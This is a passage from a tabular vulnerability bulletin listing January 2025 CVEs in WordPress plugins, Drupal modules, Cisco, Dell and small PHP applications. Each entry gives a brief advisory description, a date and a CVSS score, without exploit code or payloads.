Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ben Huson List Pages at Depth allows Stored XSS.This issue affects List Pages at Depth: from n/a through 1.5. | 2025-01-07 | 6.5 | CVE-2025-22517 |
| bestwpdeveloper--BWD Elementor Addons (2500+ presets, Meet The Team, Lottie, Lord Icon, Masking, Woocommerce, Theme Builder, Products, Blogs, CV, Contact Form 7 Styler, Header, Slider, Hero Section) |
The BWD Elementor Addons plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.3.18 in widgets/bwdeb-content-switcher.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft template data. | 2025-01-07 | 4.3 | CVE-2024-12532 |
| bharatkambariya--Donation Block For PayPal |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in bharatkambariya Donation Block For PayPal allows Stored XSS.This issue affects Donation Block For PayPal: from n/a through 2.2.0. | 2025-01-07 | 6.5 | CVE-2025-22525 |
| Biltorvet A/S--Biltorvet Dealer Tools |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Biltorvet A/S Biltorvet Dealer Tools allows Stored XSS.This issue affects Biltorvet Dealer Tools: from n/a through 1.0.22. | 2025-01-07 | 6.5 | CVE-2025-22580 |
| binsaifullah--Duplicate Post, Page and Any Custom Post |
The Duplicate Post, Page and Any Custom Post plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.5.3 via the 'dpp_duplicate_as_draft' function. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract potentially sensitive data from draft, scheduled (future), private, and password protected posts. | 2025-01-07 | 4.3 | CVE-2024-12538 |
| Bishawjit Das--wp custom countdown |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Bishawjit Das wp custom countdown allows Stored XSS.This issue affects wp custom countdown: from n/a through 2.8. | 2025-01-09 | 6.5 | CVE-2025-22822 |
| bitlydeveloper--Bitly's WordPress Plugin |
The Bitly's WordPress Plugin plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several AJAX actions in all versions up to, and including, 2.7.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update and retrieve plugin settings. | 2025-01-09 | 4.3 | CVE-2024-12616 |
| bizappventures--Bizapp for WooCommerce |
The Bizapp for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'error' parameter in all versions up to, and including, 2.0.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-01-07 | 6.1 | CVE-2024-11378 |
| biztechc--WP jQuery DataTable |
The WP jQuery DataTable plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wp_jdt' shortcode in all versions up to, and including, 4.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-07 | 6.4 | CVE-2024-12499 |
| biztechc--WP jQuery DataTable |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in biztechc WP jQuery DataTable allows Stored XSS.This issue affects WP jQuery DataTable: from n/a through 4.0.1. | 2025-01-07 | 6.5 | CVE-2024-56287 |
| blueberryacc--Files Download Delay |
The Files Download Delay plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'fddwrap' shortcode in all versions up to, and including, 1.0.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-09 | 6.4 | CVE-2024-12493 |
| bPlugins LLC--Button Block |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in bPlugins LLC Button Block allows Stored XSS.This issue affects Button Block: from n/a through 1.1.6. | 2025-01-09 | 6.5 | CVE-2025-22815 |
| bqworks--Accordion Slider Lite |
The Accordion Slider Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'accordion_slider' shortcode in all versions up to, and including, 1.5.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-11 | 6.4 | CVE-2024-11892 |
| bqworks--Grid Accordion Lite |
The Grid Accordion Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'grid_accordion' shortcode in all versions up to, and including, 1.5.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-11 | 6.4 | CVE-2024-11874 |
| bqworks--Slider Pro Lite |
The Slider Pro Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'sliderpro' shortcode in all versions up to, and including, 1.4.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-07 | 6.4 | CVE-2024-11899 |
| Brainstorm Force--Astra Widgets |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Brainstorm Force Astra Widgets allows Stored XSS.This issue affects Astra Widgets: from n/a through 1.2.15. | 2025-01-07 | 6.5 | CVE-2024-56274 |
| brainstormforce--SureForms Drag and Drop Form Builder for WordPress |
The SureForms - Drag and Drop Form Builder for WordPress plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.2.2 via the handle_export_form() function due to a missing capability check. This makes it possible for unauthenticated attackers to export data from password protected, private, or draft posts that they should not have access to. | 2025-01-08 | 5.3 | CVE-2024-12713 |
| brandtoss--WP Mailster |
Insertion of Sensitive Information Into Sent Data vulnerability in brandtoss WP Mailster allows Retrieve Embedded Sensitive Data.This issue affects WP Mailster: from n/a through 1.8.17.0. | 2025-01-07 | 5.3 | CVE-2025-22303 |
| brianmiyaji--Legacy ePlayer |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in brianmiyaji Legacy ePlayer allows Stored XSS.This issue affects Legacy ePlayer: from n/a through 0.9.9. | 2025-01-07 | 6.5 | CVE-2025-22572 |
| britner--Gutenberg Blocks with AI by Kadence WP Page Builder Features |
The Gutenberg Blocks with AI by Kadence WP - Page Builder Features plugin for WordPress is vulnerable to Stored Cross-Site Scripting via button block link in all versions up to, and including, 3.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-11 | 6.4 | CVE-2024-12304 |
| brownoxford--Member Access |
The Member Access plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.1.6 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as administrator. | 2025-01-07 | 5.3 | CVE-2024-11290 |
| Bytephp--Arcade Ready |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Bytephp Arcade Ready allows Stored XSS.This issue affects Arcade Ready: from n/a through 1.1. | 2025-01-07 | 6.5 | CVE-2025-22581 |
| calculatorscanadaca--CC Canadian Mortgage Calculator |
The CC Canadian Mortgage Calculator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'cc-mortgage-canada' shortcode in all versions up to, and including, 2.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-07 | 6.4 | CVE-2024-11383 |
| CampCodes--Computer Laboratory Management System |
A vulnerability, which was classified as critical, has been found in CampCodes Computer Laboratory Management System 1.0. Affected by this issue is some unknown functionality of the file /class/edit/edit. The manipulation of the argument e_photo leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-01-09 | 6.3 | CVE-2025-0341 |
| candifly--Candifly |
The Candifly plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'candifly' shortcode in all versions up to, and including, 1.0.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-07 | 6.4 | CVE-2024-12440 |
| CBB Team--Content Blocks Builder |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CBB Team Content Blocks Builder allows Stored XSS.This issue affects Content Blocks Builder: from n/a through 2.7.6. | 2025-01-09 | 6.5 | CVE-2025-22810 |
| ChatBot for WordPress - WPBot--Conversational Forms for ChatBot |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ChatBot for WordPress - WPBot Conversational Forms for ChatBot allows Stored XSS.This issue affects Conversational Forms for ChatBot: from n/a through 1.4.2. | 2025-01-09 | 6.5 | CVE-2025-22813 |
| chative--Chative Live chat and Chatbot |
The Chative Live chat and Chatbot plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1. This is due to missing or incorrect nonce validation on the add_chative_widget_action() function. This makes it possible for unauthenticated attackers to change the channel ID or organization ID via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. This could lead to redirecting the live chat widget to an attacker-controlled channel. | 2025-01-07 | 5.4 | CVE-2024-12541 |
| chatroll--Chatroll Live Chat |
The Chatroll Live Chat plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'chatroll' shortcode in all versions up to, and including, 2.5.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-07 | 6.4 | CVE-2024-12464 |
| Cisco--Cisco Common Services Platform Collector Software |
A vulnerability in the web-based management interface of Cisco Common Services Platform Collector (CSPC) could allow an authenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the interface. This vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of an affected system. An attacker could exploit this vulnerability by injecting malicious code into specific pages of the interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. To exploit this vulnerability, the attacker must have at least a low-privileged account on an affected device. Cisco has not released software updates that address this vulnerability. There are no workarounds that address this vulnerability. | 2025-01-08 | 5.4 | CVE-2025-20166 |
| Cisco--Cisco Common Services Platform Collector Software |
A vulnerability in the web-based management interface of Cisco Common Services Platform Collector (CSPC) could allow an authenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the interface. This vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of an affected system. An attacker could exploit this vulnerability by injecting malicious code into specific pages of the interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. To exploit this vulnerability, the attacker must have at least a low-privileged account on an affected device. Cisco has not released software updates that address this vulnerability. There are no workarounds that address this vulnerability. | 2025-01-08 | 5.4 | CVE-2025-20167 |
| Cisco--Cisco Common Services Platform Collector Software |
A vulnerability in the web-based management interface of Cisco Common Services Platform Collector (CSPC) could allow an authenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the interface. This vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of an affected system. An attacker could exploit this vulnerability by injecting malicious code into specific pages of the interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. To exploit this vulnerability, the attacker must have at least a low-privileged account on an affected device. Cisco has not released software updates that address this vulnerability. There are no workarounds that address this vulnerability. | 2025-01-08 | 5.4 | CVE-2025-20168 |
| Cisco--Cisco Crosswork Network Change Automation |
Multiple vulnerabilities in the web-based management interface of Cisco Crosswork Network Controller could allow an authenticated, remote attacker to conduct cross-site scripting (XSS) attacks against users of the interface of an affected system. These vulnerabilities exist because the web-based management interface does not properly validate user-supplied input. An attacker could exploit these vulnerabilities by inserting malicious data into specific data fields in the interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. To exploit these vulnerabilities, the attacker must have valid administrative credentials. Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities. | 2025-01-08 | 4.8 | CVE-2025-20123 |
| Cisco--Cisco ThousandEyes Endpoint Agent |
A vulnerability in certification validation routines of Cisco ThousandEyes Endpoint Agent for macOS and RoomOS could allow an unauthenticated, remote attacker to intercept or manipulate metrics information. This vulnerability exists because the affected software does not properly validate certificates for hosted metrics services. An on-path attacker could exploit this vulnerability by intercepting network traffic using a crafted certificate. A successful exploit could allow the attacker to masquerade as a trusted host and monitor or change communications between the remote metrics service and the vulnerable client. | 2025-01-08 | 4.8 | CVE-2025-20126 |
| cluevo--CLUEVO LMS, E-Learning Platform |
The CLUEVO LMS, E-Learning Platform plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.13.2. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-01-09 | 6.1 | CVE-2024-11328 |
| Code Themes--Digi Store |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Code Themes Digi Store allows DOM-Based XSS.This issue affects Digi Store: from n/a through 1.1.4. | 2025-01-07 | 6.5 | CVE-2025-22354 |
| code-projects--Content Management System |
A vulnerability was found in code-projects Content Management System 1.0. It has been classified as critical. This affects an unknown part of the file /admin/publishnews.php of the component Publish News Page. The manipulation of the argument image leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2025-01-09 | 4.7 | CVE-2025-0346 |
| code-projects--Online Bike Rental System |
A vulnerability was found in code-projects Online Bike Rental System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the component Change Image Handler. The manipulation leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Other endpoints might be affected as well. | 2025-01-09 | 6.3 | CVE-2025-0335 |
| code-projects--Online Book Shop |
A vulnerability was found in code-projects Online Book Shop 1.0. It has been classified as critical. This affects an unknown part of the file /booklist.php. The manipulation of the argument subcatid leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2025-01-07 | 6.3 | CVE-2025-0296 |
| code-projects--Online Book Shop |
A vulnerability was found in code-projects Online Book Shop 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /detail.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-01-07 | 6.3 | CVE-2025-0297 |
| code-projects--Online Book Shop |
A vulnerability was found in code-projects Online Book Shop 1.0. It has been rated as critical. This issue affects some unknown processing of the file /process_login.php. The manipulation of the argument usernm leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-01-07 | 6.3 | CVE-2025-0298 |
| code-projects--Online Book Shop |
A vulnerability classified as critical has been found in code-projects Online Book Shop 1.0. Affected is an unknown function of the file /search_result.php. The manipulation of the argument s leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2025-01-07 | 6.3 | CVE-2025-0299 |
| code-projects--Online Book Shop |
A vulnerability classified as critical was found in code-projects Online Book Shop 1.0. Affected by this vulnerability is an unknown functionality of the file /subcat.php. The manipulation of the argument cat leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-01-07 | 6.3 | CVE-2025-0300 |
| codepopular--Unlimited Theme Addon For Elementor and WooCommerce |
The Unlimited Theme Addon For Elementor and WooCommerce plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.2.1 via the 'uta-template' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created by Elementor that they should not have access to. | 2025-01-11 | 4.3 | CVE-2024-12116 |
| Codezips--Project Management System |
A vulnerability was found in Codezips Project Management System 1.0. It has been classified as critical. This affects an unknown part of the file /pages/forms/teacher.php. The manipulation of the argument name leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2025-01-09 | 6.3 | CVE-2025-0336 |
| Coherent Graphics--CPDF |
cpdf through 2.8 allows stack consumption via a crafted PDF document. | 2025-01-08 | 4 | CVE-2024-54731 |
| commonninja--Common Ninja: Fully Customizable & Perfectly Responsive Free Widgets for WordPress Websites |
The Common Ninja: Fully Customizable & Perfectly Responsive Free Widgets for WordPress Websites plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'commonninja' shortcode in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-07 | 6.4 | CVE-2024-11382 |
| copist--Icons Enricher |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in copist Icons Enricher allows Stored XSS.This issue affects Icons Enricher: from n/a through 1.0.8. | 2025-01-07 | 6.5 | CVE-2025-22573 |
| covertcommunication--Solar Wizard Lite |
The Solar Wizard Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'solar_wizard' shortcode in all versions up to, and including, 1.2.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-07 | 6.4 | CVE-2024-11764 |
| cssimmon--Backup and Restore WordPress Backup Plugin |
The Backup and Restore WordPress - Backup Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.50. This is due to missing or incorrect nonce validation on the ajax_queue_manual_backup() function. This makes it possible for unauthenticated attackers to trigger backups via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-01-07 | 4.3 | CVE-2024-12208 |
| CubeWP--CubeWP Forms All-in-One Form Builder |
Missing Authorization vulnerability in CubeWP CubeWP Forms - All-in-One Form Builder allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects CubeWP Forms - All-in-One Form Builder: from n/a through 1.1.5. | 2025-01-07 | 5.3 | CVE-2024-51651 |
| Damion Armentrout--Able Player |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Damion Armentrout Able Player allows DOM-Based XSS.This issue affects Able Player: from n/a through 1.0. | 2025-01-07 | 6.5 | CVE-2025-22577 |
| Daniel Walmsley--VR Views |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Daniel Walmsley VR Views allows Stored XSS.This issue affects VR Views: from n/a through 1.5.1. | 2025-01-09 | 6.5 | CVE-2025-22820 |
| daniel1088--PIXNET Plugin |
The PIXNET Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'gtm' and 'venue' parameters in all versions up to, and including, 2.9.10 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-07 | 6.4 | CVE-2024-11338 |
| dearhive--Dear Flipbook PDF Flipbook, 3D Flipbook, PDF embed, PDF viewer |
The PDF Flipbook, 3D Flipbook-DearFlip plugin for WordPress is vulnerable to Stored Cross-Site Scripting via outline settings in all versions up to 2.3.52 due to insufficient input sanitization and output escaping on user-supplied data. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-08 | 6.4 | CVE-2024-11830 |
| DearHive--Social Media Share Buttons | MashShare |
Missing Authorization vulnerability in DearHive Social Media Share Buttons | MashShare.This issue affects Social Media Share Buttons | MashShare: from n/a through 4.0.47. | 2025-01-07 | 4.3 | CVE-2025-22319 |
| deios--Financial Stocks & Crypto Market Data Plugin |
The Financial Stocks & Crypto Market Data Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'e' parameter in all versions up to, and including, 1.10.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-01-07 | 6.1 | CVE-2024-11690 |
| dell -- powerscale_onefs |
Dell PowerScale OneFS 8.2.2.x through 9.8.0.x contains an incorrect permission assignment for critical resource vulnerability. A locally authenticated attacker could potentially exploit this vulnerability, leading to denial of service. | 2025-01-06 | 5 | CVE-2024-47475 |
| Dell--PowerScale OneFS |
Dell PowerScale OneFS versions 8.2.2.x through 9.9.0.0 contain an uncontrolled resource consumption vulnerability. A remote low privileged attacker could potentially exploit this vulnerability, leading to denial of service. | 2025-01-08 | 6.5 | CVE-2024-47239 |
| Digital Zoom Studio--Admin debug wordpress enable debug |
Cross-Site Request Forgery (CSRF) vulnerability in Digital Zoom Studio Admin debug wordpress - enable debug allows Cross Site Request Forgery.This issue affects Admin debug wordpress - enable debug: from n/a through 1.0.13. | 2025-01-07 | 4.3 | CVE-2025-22503 |
| divineapi--Horoscope And Tarot |
The Horoscope And Tarot plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'divine_horoscope' shortcode in all versions up to, and including, 1.3.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-07 | 6.4 | CVE-2024-11337 |
| dn88--Highlight |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in dn88 Highlight allows Stored XSS.This issue affects Highlight: from n/a through 2.0.2. | 2025-01-07 | 5.9 | CVE-2024-56297 |
| donglight--bookstore |
A vulnerability was found in donglight bookstore电商书城系统说明 1.0.0. It has been classified as critical. This affects the function getHtml of the file src/main/java/org/zdd/bookstore/rawl/HttpUtil.java. The manipulation of the argument url leads to server-side request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2025-01-09 | 6.3 | CVE-2024-13195 |
| donglight--bookstore |
A vulnerability was found in donglight bookstore电商书城系统说明 1.0. It has been declared as critical. Affected by this vulnerability is the function uploadPicture of the file src/main/java/org/zdd/bookstore/web/controller/admin/AdminBookController. java. The manipulation of the argument pictureFile leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-01-09 | 4.7 | CVE-2024-13210 |
| Drupal--CKEditor 4 LTS - WYSIWYG HTML editor |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Drupal CKEditor 4 LTS - WYSIWYG HTML editor allows Cross-Site Scripting (XSS).This issue affects CKEditor 4 LTS - WYSIWYG HTML editor: from 1.0.0 before 1.0.1. | 2025-01-09 | 5.4 | CVE-2024-13245 |
| Drupal--Coffee |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Drupal Coffee allows Cross-Site Scripting (XSS).This issue affects Coffee: from 0.0.0 before 1.4.0. | 2025-01-09 | 4.8 | CVE-2024-13247 |
| Drupal--Commerce View Receipt |
Incorrect Authorization vulnerability in Drupal Commerce View Receipt allows Forceful Browsing.This issue affects Commerce View Receipt: from 0.0.0 before 1.0.3. | 2025-01-09 | 5.3 | CVE-2024-13257 |
| Drupal--Cookiebot + GTM |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Drupal Cookiebot + GTM allows Cross-Site Scripting (XSS).This issue affects Cookiebot + GTM: from 0.0.0 before 1.0.18. | 2025-01-09 | 5.4 | CVE-2024-13289 |
| Drupal--Download All Files |
Missing Authorization vulnerability in Drupal Download All Files allows Forceful Browsing.This issue affects Download All Files: from 0.0.0 before 2.0.2. | 2025-01-09 | 5.3 | CVE-2024-13303 |
| Drupal--Eloqua |
Deserialization of Untrusted Data vulnerability in Drupal Eloqua allows Object Injection.This issue affects Eloqua: from 7.X-* before 7.X-1.15. | 2025-01-09 | 6.6 | CVE-2024-13297 |
| Drupal--Entity Delete Log |
Missing Authorization vulnerability in Drupal Entity Delete Log allows Forceful Browsing.This issue affects Entity Delete Log: from 0.0.0 before 1.1.1. | 2025-01-09 | 6.5 | CVE-2024-13243 |
| Drupal--Entity Form Steps |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Drupal Entity Form Steps allows Cross-Site Scripting (XSS).This issue affects Entity Form Steps: from 0.0.0 before 1.1.4. | 2025-01-09 | 4.8 | CVE-2024-13305 |
| Drupal--Facets |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Drupal Facets allows Cross-Site Scripting (XSS).This issue affects Facets: from 0.0.0 before 2.0.9. | 2025-01-09 | 6.1 | CVE-2024-13283 |
| Drupal--File Entity (fieldable files) |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Drupal File Entity (fieldable files) allows Cross-Site Scripting (XSS).This issue affects File Entity (fieldable files): from 7.X-* before 7.X-2.38. | 2025-01-09 | 5.4 | CVE-2024-13237 |
| Drupal--Mailjet |
Deserialization of Untrusted Data vulnerability in Drupal Mailjet allows Object Injection.This issue affects Mailjet: from 0.0.0 before 4.0.1. | 2025-01-09 | 6.6 | CVE-2024-13296 |
| Drupal--Minify JS |
Cross-Site Request Forgery (CSRF) vulnerability in Drupal Minify JS allows Cross Site Request Forgery.This issue affects Minify JS: from 0.0.0 before 3.0.3. | 2025-01-09 | 4.5 | CVE-2024-13304 |
| Drupal--Monster Menus |
Deserialization of Untrusted Data vulnerability in Drupal Monster Menus allows Object Injection.This issue affects Monster Menus: from 0.0.0 before 9.3.4, from 9.4.0 before 9.4.2. | 2025-01-09 | 4.3 | CVE-2024-13288 |
| Drupal--Node Access Rebuild Progressive |
Improper Ownership Management vulnerability in Drupal Node Access Rebuild Progressive allows Target Influence via Framing.This issue affects Node Access Rebuild Progressive: from 0.0.0 before 2.0.2. | 2025-01-09 | 5.3 | CVE-2024-13246 |
| Drupal--Node Access Rebuild Progressive |
Improper Ownership Management vulnerability in Drupal Node Access Rebuild Progressive allows Target Influence via Framing.This issue affects Node Access Rebuild Progressive: from 7.X-1.0 before 7.X-1.2. | 2025-01-09 | 5.4 | CVE-2024-13249 |
| Drupal--Node export |
Deserialization of Untrusted Data vulnerability in Drupal Node export allows Object Injection.This issue affects Node export: from 7.X-* before 7.X-3.3. | 2025-01-09 | 6.6 | CVE-2024-13295 |
| Drupal--OAuth & OpenID Connect Single Sign On SSO (OAuth/OIDC Client) |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Drupal OAuth & OpenID Connect Single Sign On - SSO (OAuth/OIDC Client) allows Cross-Site Scripting (XSS).This issue affects OAuth & OpenID Connect Single Sign On - SSO (OAuth/OIDC Client): from 3.0.0 before 3.44.0, from 4.0.0 before 4.0.19. | 2025-01-09 | 6.1 | CVE-2024-13301 |
| Drupal--Open Social |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Drupal Open Social allows Cross-Site Scripting (XSS).This issue affects Open Social: from 0.0.0 before 12.3.8, from 12.4.0 before 12.4.5, from 13.0.0 before 13.0.0-alpha11. | 2025-01-09 | 5.4 | CVE-2024-13273 |
| Drupal--Opigno group manager |
Improper Neutralization of Directives in Statically Saved Code ('Static Code Injection') vulnerability in Drupal Opigno group manager allows PHP Local File Inclusion.This issue affects Opigno group manager: from 0.0.0 before 3.1.1. | 2025-01-09 | 5.5 | CVE-2024-13263 |
| Drupal--Pages Restriction Access |
Incorrect Authorization vulnerability in Drupal Pages Restriction Access allows Forceful Browsing.This issue affects Pages Restriction Access: from 2.0.0 before 2.0.3. | 2025-01-09 | 5.3 | CVE-2024-13302 |
| Drupal--POST File |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Drupal POST File allows Cross-Site Scripting (XSS).This issue affects POST File: from 0.0.0 before 1.0.2. | 2025-01-09 | 5.4 | CVE-2024-13294 |
| Drupal--Private content |
Incorrect Privilege Assignment vulnerability in Drupal Private content allows Target Influence via Framing.This issue affects Private content: from 0.0.0 before 2.1.0. | 2025-01-09 | 5.5 | CVE-2024-13248 |
| Drupal--SVG Embed |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Drupal SVG Embed allows Cross-Site Scripting (XSS).This issue affects SVG Embed: from 0.0.0 before 2.1.2. | 2025-01-09 | 5.4 | CVE-2024-13286 |
| Drupal--TacJS |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Drupal TacJS allows Cross-Site Scripting (XSS).This issue affects TacJS: from 0.0.0 before 6.5.0. | 2025-01-09 | 5.4 | CVE-2024-13252 |
| Drupal--Tarte au Citron |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Drupal Tarte au Citron allows Cross-Site Scripting (XSS).This issue affects Tarte au Citron: from 2.0.0 before 2.0.5. | 2025-01-09 | 4.8 | CVE-2024-13298 |
| Drupal--Tooltip |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Drupal Tooltip allows Cross-Site Scripting (XSS).This issue affects Tooltip: from 0.0.0 before 1.1.2. | 2025-01-09 | 4.8 | CVE-2024-13292 |
| Drupal--Typogrify |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Drupal Typogrify allows Cross-Site Scripting (XSS).This issue affects Typogrify: from 0.0.0 before 1.3.0. | 2025-01-09 | 5.4 | CVE-2024-13238 |
| Drupal--View Password |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Drupal View Password allows Cross-Site Scripting (XSS).This issue affects View Password: from 0.0.0 before 6.0.4. | 2025-01-09 | 4.8 | CVE-2024-13262 |
| Drupal--Views SVG Animation |
